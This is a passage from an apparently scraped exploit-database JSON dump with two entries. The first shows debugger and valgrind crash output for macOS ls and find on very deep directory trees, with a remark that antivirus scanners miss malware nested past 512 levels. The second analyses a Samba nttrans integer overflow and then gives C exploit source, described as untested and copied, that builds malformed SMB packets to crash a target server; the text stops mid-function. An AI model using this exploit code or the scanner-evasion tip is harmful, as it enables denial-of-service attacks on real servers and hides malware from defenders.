%esi\r\n 0x7fff97ab6d3a <+26>: andq $0xf, %rcx\r\n 0x7fff97ab6d3e <+30>: orq $-0x1, %rax\r\n\r\n(lldb) x/x $rdi\r\nerror: memory read failed for 0xfeb66c00\r\n(lldb) register read\r\nGeneral Purpose Registers:\r\n rax = 0x00000000ffffffff\r\n rbx = 0x00000000ffffffff\r\n rcx = 0x00000000feb66c08\r\n rdx = 0x00000000feb66c08\r\n rdi = 0x00000000feb66c00\r\n rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742\r\n rbp = 0x00007fff5fbfe710\r\n rsp = 0x00007fff5fbfe710\r\n...\r\n rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\n...\r\n(lldb) bt\r\n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)\r\n * frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\n frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713\r\n frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669\r\n frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596\r\n frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80\r\n frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128\r\n frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564\r\n frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421\r\n frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300\r\n frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1\r\n\r\n=== Time for Valgrind =============\r\n\r\nB/B/B/B/B/../B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n\r\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n==1009== Invalid write of size 1\r\n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100001DAD: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== by 0x104809C8D: ???\r\n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd\r\n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100001B92: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== by 0x104809C8D: ???\r\n==1009== \r\n\r\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\n==1009== Invalid read of size 1\r\n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x1000024A7: ??? (in /bin/ls)\r\n==1009== by 0x100001CFC: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd\r\n==1009== \r\n==1009== \r\n==1009== Process terminating with default action of signal 11 (SIGSEGV)\r\n==1009== Access not within mapped region at address 0x102D20318\r\n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x1000024A7: ??? (in /bin/ls)\r\n==1009== by 0x100001CFC: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== If you believe this happened as a result of a stack\r\n==1009== overflow in your program's main thread (unlikely but\r\n==1009== possible), you can try to increase the size of the\r\n==1009== main thread stack using the --main-stacksize= flag.\r\n==1009== The main thread stack size used in this run was 8388608.\r\n==1009== \r\n==1009== HEAP SUMMARY:\r\n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks\r\n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated\r\n==1009== \r\n==1009== LEAK SUMMARY:\r\n==1009== definitely lost: 519 bytes in 6 blocks\r\n==1009== indirectly lost: 104 bytes in 6 blocks\r\n==1009== possibly lost: 0 bytes in 0 blocks\r\n==1009== still reachable: 1,645,151 bytes in 5,819 blocks\r\n==1009== suppressed: 26,225 bytes in 194 blocks\r\n==1009== Rerun with --leak-check=full to see details of leaked memory\r\n==1009== \r\n==1009== For counts of detected and suppressed errors, rerun with: -v\r\n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)\r\nSegmentation fault: 11\r\nMacMini:SCANME cxsecurity$\r\n\r\n\r\nIt looks like a buffer overflow in memmove(). Code\r\n\r\nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c\r\n\r\n\r\nThe same issue for 'find' which may be used in cron scripts like\r\n\r\n\r\n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print\r\n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print\r\n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \r\n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1;\r\n\r\n\r\nLet's see valgrind output.\r\n\r\n\r\nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\"\r\n==1055== Memcheck, a memory error detector\r\n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\r\n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\r\n==1055== Command: find . -name R\r\n==1055== \r\nfind: ./.Trashes: Permission denied\r\n==1055== Invalid write of size 2\r\n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1000013FA: ??? (in /usr/bin/find)\r\n==1055== by 0x1000052AD: ??? (in /usr/bin/find)\r\n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1055== by 0x3: ???\r\n==1055== by 0x10480CC7F: ???\r\n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd\r\n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1000013FA: ??? (in /usr/bin/find)\r\n==1055== by 0x1000052AD: ??? (in /usr/bin/find)\r\n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1055== by 0x3: ???\r\n==1055== by 0x10480CC7F: ???\r\n...\r\n\r\nInvalid memory write without crashing.\r\n\r\n \r\nBTW:\r\nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc.\r\n\r\n\r\n====== Thanks ===================================\r\nKacper and Smash_ from DEVILTEAM for technical support.\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24685"}, {"lastseen": "2018-01-06T09:10:59", "bulletinFamily": "exploit", "description": "vulnerable samba daemon has a integer overflow \rto cause remote dos by nttrans reply while the \rdaemon reading ea_list. In the detail, unsigned\rdata type offset variable in vulnerable function \rof read_nttrans_ea_list can be wrap up! security\rbug!", "modified": "2013-08-22T00:00:00", "published": "2013-08-22T00:00:00", "id": "1337DAY-ID-21146", "href": "https://0day.today/exploit/description/21146", "type": "zdt", "title": "Samba nttrans Reply - Integer Overflow Vulnerability", "sourceData": "[security bug analyze]\r\nsmbd/nttrans.c\r\n---- snip ---- snip ---- snip ---- snip ----\r\n971 /****************************************************************************\r\n 972 Read a list of EA names and data from an incoming data buffer. Create an ea_list with them.\r\n 973 ****************************************************************************/\r\n 974 EA names, data from samba incoming buffer!\r\n 975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata, size_t data_size) // *pdata is inject vector\r\n 976 {\r\n 977 struct ea_list *ea_list_head = NULL;\r\n 978 size_t offset = 0; // unisigned\r\n 979 \r\n 980 if (data_size < 4) {\r\n 981 return NULL;\r\n 982 }\r\n 983 \r\n 984 while (offset + 4 <= data_size) { // XXX (3) if offset is wrap up then it enters the loop continuly\r\n 985 size_t next_offset = IVAL(pdata,offset); // unsigned XXX (1) if next_offset from pdata pointer is much large value then to lead integer wrap!\r\n// XXX (4) may memory corruption point! if offset is wrap up then second argv pointer(pdata+offset+4) pointers around zero memory then smb dos! \r\n 986 struct ea_list *eal = read_ea_list_entry(ctx, pdata + offset + 4, data_size - offset - 4, NULL);\r\n 987 \r\n 988 if (!eal) {\r\n 989 return NULL;\r\n 990 }\r\n 991 \r\n 992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *);\r\n 993 if (next_offset == 0) {\r\n 994 break;\r\n 995 }\r\n 996 \r\n 997 /* Integer wrap protection for the increment. */ // XXX patch code\r\n 998 if (offset + next_offset < offset) {\r\n 999 break;\r\n1000 }\r\n1001 \r\n1002 offset += next_offset; // XXX (2) if next_offset is large value then offset is wrap!\r\n1003 \r\n1004 /* Integer wrap protection for while loop. */ // XXX patch code\r\n1005 if (offset + 4 < offset) {\r\n1006 break;\r\n1007 }\r\n1008 \r\n1009 }\r\n1010 \r\n1011 return ea_list_head;\r\n1012 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n1014 /****************************************************************************\r\n1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's).\r\n1016 ****************************************************************************/\r\n1017 \r\n1018 static void call_nt_transact_create(connection_struct *conn,\r\n1019 struct smb_request *req,\r\n1020 uint16 **ppsetup, uint32 setup_count,\r\n1021 char **ppparams, uint32 parameter_count,\r\n1022 char **ppdata, uint32 data_count,\r\n1023 uint32 max_data_count)\r\n1024 {\r\n...\r\n1148 /* We have already checked that ea_len <= data_count here. */\r\n1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len,\r\n1150 ea_len);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n2639 static void handle_nttrans(connection_struct *conn,\r\n2640 struct trans_state *state,\r\n2641 struct smb_request *req)\r\n2642 {\r\n...\r\n2651 /* Now we must call the relevant NT_TRANS function */\r\n2652 switch(state->call) {\r\n2653 case NT_TRANSACT_CREATE: // NT_TRANSACT_CREATE!\r\n2654 {\r\n2655 START_PROFILE(NT_transact_create);\r\n2656 call_nt_transact_create(\r\n2657 conn, req,\r\n2658 &state->setup, state->setup_count,\r\n2659 &state->param, state->total_param,\r\n2660 &state->data, state->total_data,\r\n2661 state->max_data_return);\r\n2662 END_PROFILE(NT_transact_create);\r\n2663 break;\r\n2664 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n2770 /****************************************************************************\r\n2771 Reply to a SMBNTtrans.\r\n2772 ****************************************************************************/\r\n2773 \r\n2774 void reply_nttrans(struct smb_request *req) // smb_request!\r\n2775 {\r\n...\r\n2945 if ((state->received_data == state->total_data) &&\r\n2946 (state->received_param == state->total_param)) {\r\n2947 handle_nttrans(conn, state, req);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n[exploitability]\r\n \r\n * keywords:\r\n - samba incoming data\r\n - EA names\r\n - data\r\n - 0xf1000000\r\n - SMB NTTRANS\r\n - Samba reply_nttrans() Remote Root Exploit\r\n (http://www.securiteam.com/exploits/5TP0M2AAKS.html)\r\n - SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field)\r\n - SMBtrans\r\n - http://ubiqx.org/cifs/SMB.html\r\n \r\n \r\nThe security bug is remote dos to a daemon, the \r\nimpact is exist even though it's exploited on \r\nlocal network. If large local network exist and \r\nmany samba on the network, security risk is exist. \r\nI assign the dos impact to medium, and the apache \r\nor wuftpd dos to high because they are can be \r\nexploited on internet\r\n \r\n/*\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n \r\n CVE-2013-4124 samba remote dos private exploit\r\n \r\n \r\n ./samba_nttrans_exploit [target ip addr]\r\n \r\n * ... test ...:\r\n I didn't test for the exploit, I \r\n copied another samba nttrans exploit \r\n in 2003 that http://www.securiteam.co\r\n m/exploits/5TP0M2AAKS.html. It should \r\n be works!\r\n \r\n the exploit send malformed nttrans \r\n smb packet with large value of data \r\n offset to cause integer wrap in the \r\n vulnerable function of read_nttrns_ea_list\r\n \r\n I left an article that analyzed it\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n \r\n \r\n x90c\r\n \r\n*/\r\n \r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include <signal.h>\r\n \r\ntypedef unsigned char uint8;\r\ntypedef unsigned short uint16;\r\ntypedef unsigned long uint32;\r\n \r\nstruct variable_data_header\r\n{ uint8 wordcount, bytecount[2];\r\n};\r\n \r\nstruct nbt_session_header\r\n{ uint8 type, flags, len[2];\r\n};\r\n \r\nstruct smb_base_header\r\n{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];\r\n uint8 flags;\r\n uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];\r\n};\r\n \r\nstruct negprot_reply_header\r\n{ uint8 wordcount;\r\n uint8 dialectindex[2];\r\n uint8 securitymode;\r\n uint16 maxmpxcount, maxvccount;\r\n uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;\r\n uint16 timezone;\r\n uint8 keylen;\r\n uint16 bytecount;\r\n};\r\n \r\nstruct sesssetupx_request_header\r\n{ uint8 wordcount, command, reserved;\r\n uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];\r\n uint8 sessionid[4];\r\n uint8 ipasswdlen[2], passwdlen[2];\r\n uint8 reserved2[4], capabilities[4];\r\n};\r\n \r\nstruct sesssetupx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];\r\n};\r\n \r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n};\r\n \r\nstruct tconx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];\r\n};\r\n \r\nstruct nttrans_primary_request_header\r\n{ \r\n uint8 wordcount; \r\n uint8 maxsetupcount; \r\n uint8 flags[2];\r\n uint8 totalparamcount[4]; \r\n uint8 totaldatacount[4];\r\n uint8 maxparamcount[4];\r\n uint8 maxdatacount[4];\r\n uint8 paramcount[4];\r\n uint8 paramoffset[4];\r\n uint8 datacount[4];\r\n uint8 dataoffset[4]; // XXXX 0xf000000\r\n uint8 setupcount; \r\n uint8 function[2]; \r\n uint8 bytecount[2];\r\n};\r\n \r\n#define SMB_NEGPROT 0x72\r\n#define SMB_SESSSETUPX 0x73\r\n#define SMB_TCONX 0x75\r\n#define SMB_TRANS2 0x32\r\n#define SMB_NTTRANS 0xA0\r\n#define SMB_NTTRANSCREATE 0x01\r\n#define SMB_TRANS2OPEN 0x00\r\n#define SMB_SESSIONREQ 0x81\r\n#define SMB_SESSION 0x00\r\n \r\nuint32 sessionid, PARAMBASE = 0x81c0000;\r\nchar *tconx_servername;\r\nint tid, pid, uid;\r\n \r\n#define STACKBOTTOM 0xbfffffff\r\n#define STACKBASE 0xbfffd000\r\n#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))\r\n \r\nchar *netbios_encode_name(char *name, int type)\r\n{ char plainname[16], c, *encoded, *ptr;\r\n int i, len = strlen(name);\r\n if ((encoded = malloc(34)) == NULL)\r\n { fprintf(stderr, \"malloc() failed\\n\");\r\n exit(-1);\r\n }\r\n ptr = encoded;\r\n strncpy(plainname, name, 15);\r\n *ptr++ = 0x20;\r\n for (i = 0; i < 16; i++)\r\n { if (i == 15) c = type;\r\n else \r\n { if (i < len) c = toupper(plainname[i]);\r\n else c = 0x20;\r\n }\r\n *ptr++ = (((c >> 4) & 0xf) + 0x41);\r\n *ptr++ = ((c & 0xf) + 0x41);\r\n }\r\n *ptr = '\\0';\r\n return encoded;\r\n}\r\n \r\nvoid construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)\r\n{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;\r\n uint16 nlen;\r\n \r\n// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..\r\n if (len > 65535) nlen = 65535;\r\n else nlen = htons(len);\r\n \r\n memset((void *)nbt_hdr, '\\0', sizeof (struct nbt_session_header));\r\n \r\n nbt_hdr->type = type;\r\n nbt_hdr->flags = flags;\r\n memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));\r\n}\r\n \r\n// caller zorgt voor juiste waarde van ptr.\r\nvoid construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, \r\n uint16 uid, uint16 mid)\r\n{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;\r\n \r\n memset(base_hdr, '\\0', sizeof (struct smb_base_header));\r\n \r\n memcpy(base_hdr->protocol, \"\\xffSMB\", 4);\r\n \r\n base_hdr->command = command;\r\n base_hdr->flags = flags;\r\n \r\n memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));\r\n memcpy(&base_hdr->tid, &tid, sizeof (uint16));\r\n memcpy(&base_hdr->pid, &pid, sizeof (uint16));\r\n memcpy(&base_hdr->uid, &uid, sizeof (uint16));\r\n memcpy(base_hdr->mid, &mid, sizeof (uint16));\r\n}\r\n \r\nvoid construct_sesssetupx_header(char *ptr)\r\n{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;\r\n uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;\r\n uint32 capabilities = 0x50;\r\n \r\n memset(sx_hdr, '\\0', sizeof (struct sesssetupx_request_header));\r\n \r\n sx_hdr->wordcount = 13;\r\n sx_hdr->command = 0xff;\r\n memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));\r\n memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));\r\n memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));\r\n memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));\r\n memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));\r\n}\r\n \r\n/*\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];\r\n}; */\r\nvoid construct_tconx_header(char *ptr)\r\n{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;\r\n uint16 passwdlen = 1, bytecount;\r\n char *data;\r\n \r\n memset(tx_hdr, '\\0', sizeof (struct tconx_request_header));\r\n \r\n bytecount = strlen(tconx_servername) + 15; \r\n \r\n if ((data = malloc(bytecount)) == NULL)\r\n { fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n memcpy(data, \"\\x00\\x5c\\x5c\", 3);\r\n memcpy(data + 3, tconx_servername, strlen(tconx_servername));\r\n memcpy(data + 3 + strlen(tconx_servername), \"\\x5cIPC\\x24\\x00\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\", 12);\r\n \r\n tx_hdr->wordcount = 4;\r\n tx_hdr->xcommand = 0xff;\r\n \r\n memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));\r\n memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));\r\n \r\n memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);\r\n}\r\n \r\nvoid nbt_session_request(int fd, char *clientname, char *servername)\r\n{ \r\n char *cn, *sn;\r\n char packet[sizeof (struct nbt_session_header) + (34 * 2)];\r\n \r\n construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n \r\n tconx_servername = servername;\r\n \r\n sn = netbios_encode_name(servername, 0x20);\r\n cn = netbios_encode_name(clientname, 0x00);\r\n \r\n memcpy(packet + sizeof (struct nbt_session_header), sn, 34);\r\n memcpy(packet + (sizeof (struct nbt_session_header) + 